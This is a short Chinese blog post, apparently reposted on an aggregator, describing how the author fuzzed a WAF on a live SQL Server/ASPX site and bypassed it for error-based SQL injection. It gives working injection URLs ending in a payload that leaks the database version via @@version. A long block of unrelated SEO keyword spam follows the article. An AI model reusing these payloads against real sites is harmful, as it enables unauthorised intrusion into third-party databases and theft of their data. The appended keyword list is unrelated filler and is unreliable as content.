一个非常简单的WAF绕过。。
发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,0x00 前言确实是非常简单,如果是新手的话,我希望能给你带来一些思路,老鸟的话就emm...0x01 起因工具扫到了一个有sqlserver特性的站点通常出现这种错误信息,说明该站点配置不当,错误信
千家信息网最后更新 2025年01月20日一个非常简单的WAF绕过。。
0x00 前言
确实是非常简单,如果是新手的话,我希望能给你带来一些思路,老鸟的话就emm...
0x01 起因
工具扫到了一个有sqlserver特性的站点
通常出现这种错误信息,说明该站点配置不当,错误信息会直接显示,也没用强制类型转换的信息,那么一般就有报错型注入了!来检测一下
却出现了WAF的信息
0x02 fuzz
遇到WAF首先得先看看是什么关键字触发了拦截请求,所以我们先进行简单的调试
http://xxxx/xxxx.aspx?xxxx=1' and --a
语法出错是很正常的,因为我们添加了and且后面没任何值,所以我们可以假设语句变成了
select xxx from xxx where xxxx=1' and --a
但我们发现其实并没有触发WAF,说明and关键字并没有在过滤的列表当中,继续尝试
http://xxxx/xxxx.aspx?xxxx=1' and 1=1 --a
竟然触发了WAF,经过多次调试,发现是and后面居然不能带数字。。这样就不会报错了
http://xxxx/xxxx.aspx?xxxx=1' and a=1 --a
那么再次尝试下原来的代码,将顺序调整,成功!
http://xxxx/xxxx.aspx?xxxx=1' and @@version=1 --a
信息
关键
关键字
错误
尝试
不当
成功
代码
再次
前言
工具
思路
数字
新手
特性
站点
类型
老鸟
语句
语法
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
所以网络安全是相对的
数据库和数据挖掘的应用
校园网登录服务器超时
我的世界带材质包的服务器
郑州大学数据库复试课程
中兴魔百盒时间服务器
网络安全工程师5级
软件开发制度汇编
wps软件开发工具里宏
寻甸第三方软件开发咨询报价
郑州金水区软件开发公司
安徽工控软件开发定做
方舟手游进服送翼龙的服务器
网络安全今年薪资
博士后数据库
数据库表一是表二的外键
镇远手机软件开发
数字通信软件开发工程师
科目一网络安全重点
虎乡行吟地方数据库
网络安全属于什么类型论文
三脚猫网络技术
函授计算机科学网络技术
福州众柜网络技术有限公司
简化软件开发
sql数据库正在使用失败
魔兽世界免费转服的服务器
吉林综合软件开发价格走势
如何保存json到数据库
连接数据库需要下载什么